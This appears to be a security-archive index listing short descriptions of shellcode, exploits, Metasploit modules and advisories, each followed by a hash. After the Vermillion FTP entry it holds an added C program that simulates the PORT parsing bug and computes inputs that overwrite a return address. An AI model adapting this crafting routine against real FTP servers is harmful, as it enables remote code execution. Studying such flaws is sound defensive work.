26-byte Win32 shellcode that launches cmd.exe. Written for Windows XP SP2 Turkish.
907368c1775ddf7385d0c2734f57d7c482048ce7978fcd5bc65ef6d9c7ab5f0f
26-byte Win32 shellcode that launches cmd.exe. Written for Windows XP SP3 English.
397875b7dca92fc5ed4e9e0422258d87916ded2d39a840b62844fbfcfe65f5a7
Microsoft Internet Explorer versions 7 and 8 suffer from a URL validation vulnerability.
5691209f6297d7c41dfedc1fd1bc337896dda52d19cb5fb673984e723b44156a
Cisco Security Advisory - Cisco IronPort Encryption Appliance devices contain two vulnerabilities that allow remote, unauthenticated access to any file on the device and one vulnerability that allows remote, unauthenticated users to execute arbitrary code with elevated privileges. There are workarounds available to mitigate these vulnerabilities.
f55041eba86b197e802f1e3fb48e213d4b2d5aaf87e4bb30235478c5e4e0f139
Magic_Block1_2 suffers from a remote file disclosure vulnerability.
24612914e0c86a6feb2ca4d0a71edc207c32deab6232020ee1c533a0a987703b
Developed as part of G-SEC's investigation for the "Secure SSL/TLS configuration Report 2010", SSL Audit is a small tool that scans web servers for SSL support. Unlike other tools, it is not limited to the ciphers supported by SSL engines such as OpenSSL or NSS and can detect all known cipher suites. It also has a fingerprinting mode.
28724527671579a60227726d8f0274db7ecfcf5fa272303bdca45d92ef5cb702
Whitepaper called The (In)Security Of Omegle - What Omegle Users Should Know.
e80131176281cee3105d378e20511889276f7a62b84d727248ed8d1b98a6bf37
ULoki Community Forum version 2.1 suffers from a cross site scripting vulnerability.
a2190948885934c0c63581a1eb71dd1ce98a50ac4b3dd1ed99902c05081c997d
HP Security Bulletin - Potential security vulnerabilities have been identified with the Java Runtime Environment (JRE) and Java Developer Kit (JDK) delivered with HP OpenView Network Node Manager (OV NNM). These vulnerabilities may allow remote unauthorized access, privilege escalation, execution of arbitrary code, and creation of a Denial of Service (DoS).
d609c2737ba3ee1e6d4dc412f6776d14c47fbc01f340bfebad40833c6310c6fa
Serverchk.py is a Python script written to scan web applications for SQL injection vulnerabilities.
d0ddb6281fd5a4886511316dd456027446ae9f16291895b5c960f2844b37c776
Ubuntu Security Notice 898-1 - It was discovered that gnome-screensaver did not correctly handle monitor hotplugging. An attacker with physical access could cause gnome-screensaver to crash and gain access to the locked session.
ab9efb0c857c5d767a9f9fa4206aaf3b5e719739cb6d5792bfe3d17825fce697
HASHE! suffers from multiple remote SQL injection vulnerabilities.
f1aa99a84e638330cd790af752f8bb2905762e2eca9d56c8da13c526d34c33e1
HP Security Bulletin - A potential security vulnerability has been identified with HP Network Node Manager (NNM). The vulnerability could be exploited remotely to execute arbitrary commands.
2ff695113e010d874733ddd8a0a1bd5e9e0469ca39922dd749407a99da1b6d38
eSmile suffers from a remote SQL injection vulnerability.
3d3deb0e4f3512d9deed7609fa028c1675df6945080fcbc8562832700a21a0ff
A vulnerability exists in the Microsoft SMB client which allows an attacker to trigger kernel pool memory corruption by sending a specific 'Negotiate Protocol' response.
dd4096a3adf7c94d29852abe073cbc999aa234b0784a145cc1d0c9ce5a2c7733
PLS PLA WMDownloader proof of concept local buffer overflow exploit that creates a malicious .pls file.
3e61f7070ee3b03509cd8237fdb7e8db6e1bfcf8c051ab0e276e348f4fb82a24
Ubuntu Security Notice 897-1 - It was discovered that MySQL could be made to overwrite existing table files in the data directory (two separate issues). It was discovered that MySQL contained a cross-site scripting vulnerability in the command-line client when the --html option is enabled. It was discovered that MySQL contained multiple format string flaws when logging database creation and deletion. It was discovered that MySQL incorrectly handled errors when performing certain SELECT statements, and did not preserve correct flags when performing statements that use the GeomFromWKB function. It was discovered that MySQL incorrectly checked symlinks when using the DATA DIRECTORY and INDEX DIRECTORY options. It was discovered that MySQL contained a buffer overflow when parsing SSL certificates.
f0edf6f7535b1520aeb975de468f02533ed513b5b5870eefc4dccd6cc1160507
Whitepaper called Right To Left Override Unicode Can Be Used In Multiple Spoofing Cases. Written in French.
f1b0137bda26ef70c47fb6d33261363a586b255af0a7217e22295d19a8bd8fcf
FeedDemon version 3.1.0.9 .opml file local buffer overflow exploit.
bdb43462e833a38c658cf6f4ea913c59a3fd9b5d0c379adb4507e5a5ea47926b
This is a proof of concept exploit for GNOME's Nautilus file manager version 2.26.2.
bd470c247479213d341811294a08a0b0b6b129cd7ca2222f28c9ddd87f5bedf6
This Metasploit module exploits an out-of-bounds array access in the Arcane Software Vermillion FTP server. By sending a specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. The issue is caused by processing attacker-controlled input while writing into a 4-byte stack buffer. The write that occurs is not a simple byte copy: processing is done using a source pointer (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments the destination pointer. If an ASCII digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); All other input characters are ignored in this loop. As a consequence, an attacker cannot write arbitrary bytes directly and must craft input such that the modifications to the values already on the stack result in usable values. In this exploit, the low two bytes of the return address are adjusted to point at the location of a 'call edi' instruction within the binary. This was chosen since 'edi' points at the source buffer when the function returns. NOTE: This server can be installed as a service using "vftpd.exe install". If so, the service does not restart automatically, giving an attacker only one attempt.
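The parse loop described above is easier to reason about when simulated. The following C program is an added example, not the Metasploit module or the vendor's code: it reimplements the loop as the text describes it over a constructed stack frame (a 4-byte PORT buffer, 8 bytes standing in for saved registers, then a little-endian return address of 0x00401234, all of which are assumptions), and shows how to compute a digit string that drives a byte from its current value to a wanted value under the rule v = (v * 10 + d) mod 256. Since 10^8 is 0 mod 256, at most 8 digits reach any target from any start, so the constraint the text mentions (modifying rather than overwriting) is always satisfiable as long as the attacker knows the current byte values. The PORT argument built here skips over the buffer with commas only, then rewrites just the low two bytes of the return address, as the module does.

```c
/* Added example: simulation of the Vermillion FTP PORT parsing flaw.
 * Frame layout, offsets and addresses below are constructed for illustration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_OFF   0   /* where the 4-byte PORT buffer sits in the frame (assumed) */
#define RET_OFF   12  /* where the saved return address sits (assumed)          */
#define FRAME_LEN 16

/* The vulnerable loop as the text describes it: a comma advances q, a digit
 * folds into *q, anything else is ignored, and nothing bounds q. */
static void vuln_parse_port(const char *p, uint8_t *q)
{
    while (*p) {
        if (*p == ',')
            q++;
        else if (*p >= '0' && *p <= '9')
            *q = (uint8_t)(*q * 10 + (*p - '0'));
        p++;
    }
}

/* Shortest digit string that drives a byte from cur to target under
 * v = (v*10 + d) mod 256 (breadth-first search over the 256 byte states).
 * Returns the number of digits written, or -1 on failure. */
static int digits_for(uint8_t cur, uint8_t target, char *out, size_t outsz)
{
    int prev[256];
    char via[256];
    uint8_t queue[256];
    int head = 0, tail = 0;
    for (int i = 0; i < 256; i++) prev[i] = -1;
    prev[cur] = cur;
    queue[tail++] = cur;
    while (head < tail && prev[target] == -1) {
        uint8_t v = queue[head++];
        for (int d = 0; d < 10; d++) {
            uint8_t n = (uint8_t)(v * 10 + d);
            if (prev[n] == -1) {
                prev[n] = v;
                via[n] = (char)('0' + d);
                queue[tail++] = n;
            }
        }
    }
    if (prev[target] == -1) return -1;
    char tmp[16];
    int len = 0;
    for (uint8_t v = target; v != cur; v = (uint8_t)prev[v])
        tmp[len++] = via[v];              /* path collected backwards */
    if ((size_t)len + 1 > outsz) return -1;
    for (int i = 0; i < len; i++) out[i] = tmp[len - 1 - i];
    out[len] = '\0';
    return len;
}

/* Build the PORT argument: commas walk q from the buffer to start_off without
 * touching the bytes in between, then one digit group per byte to change.
 * `frame` must hold the values the bytes have when the server parses the
 * command, because the loop modifies them rather than overwriting them. */
static int craft_port(const uint8_t *frame, int start_off, int n,
                      const uint8_t *want, char *out, size_t outsz)
{
    size_t pos = 0;
    for (int i = 0; i < start_off - BUF_OFF; i++) {
        if (pos + 1 >= outsz) return -1;
        out[pos++] = ',';
    }
    for (int i = 0; i < n; i++) {
        if (i > 0) {
            if (pos + 1 >= outsz) return -1;
            out[pos++] = ',';
        }
        int len = digits_for(frame[start_off + i], want[i], out + pos, outsz - pos);
        if (len < 0) return -1;
        pos += (size_t)len;
    }
    out[pos] = '\0';
    return (int)pos;
}

/* Constructed frame with a hypothetical return address 0x00401234; the goal,
 * as in the module, is to change only its low two bytes (here to 0x5678).
 * Returns the return address read back after the vulnerable parse. */
static uint32_t demo_retaddr(char *port_arg, size_t sz)
{
    uint8_t frame[FRAME_LEN] = {
        0, 0, 0, 0,                                      /* PORT buffer   */
        0xaa, 0xaa, 0xaa, 0xaa, 0xbb, 0xbb, 0xbb, 0xbb,  /* saved regs    */
        0x34, 0x12, 0x40, 0x00                           /* ret 0x00401234 */
    };
    const uint8_t want[2] = { 0x78, 0x56 };              /* -> 0x00405678 */
    if (craft_port(frame, RET_OFF, 2, want, port_arg, sz) < 0) return 0;
    vuln_parse_port(port_arg, frame + BUF_OFF);
    return (uint32_t)frame[RET_OFF] | (uint32_t)frame[RET_OFF + 1] << 8
         | (uint32_t)frame[RET_OFF + 2] << 16 | (uint32_t)frame[RET_OFF + 3] << 24;
}

int main(void)
{
    char arg[64];
    uint32_t ret = demo_retaddr(arg, sizeof arg);
    printf("PORT %s\nreturn address after parse: 0x%08x\n", arg, ret);
    return 0;
}
```

With the constructed frame the crafted argument is twelve commas followed by "40,78": from 0x34 the digits "40" give (52*10+4) mod 256 = 12, then 12*10+0 = 120 = 0x78, and from 0x12 the digits "78" give 187, then 1878 mod 256 = 0x56. On a real target the starting values come from the actual stack contents at the time of the call, which is why the module only adjusts bytes whose original value is predictable.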
6c3e569f4a96d6f26bcfe8754e396fc55a9c9d42d38c9300f94855b2dbd501fb
This Metasploit module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script using a WebDAV PUT request.
4ec5b093ab1cb3f7824fc0789935b123c05d0f352410b2d130c1546774dfb524
This Metasploit module exploits a buffer overflow vulnerability in opcode 21 handled by rpc.cmsd on AIX. By making a request with a long string passed to the first argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This leads to arbitrary code execution.
aff1d1ff1b53822a5be662ef7f7cb50a2f60bbc8bab207ec0fc7df83f3270216
SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. Microsoft ASP.NET version 3.5, Apache MyFaces versions 1.2.8 and 1.2.7, and Sun Microsystems Mojarra versions 1.2_14 and 2.0.2 are all vulnerable.
274d820d5053b91c5b4019151e6accd446cb31435dfa6ae866e1d89dceee5e44
AdultBannerExchange suffers from an insecure cookie handling vulnerability.
f142410fb170312ad51fa6d4e8e15f8d68406e6dbfa80252e56b9626b1bb942a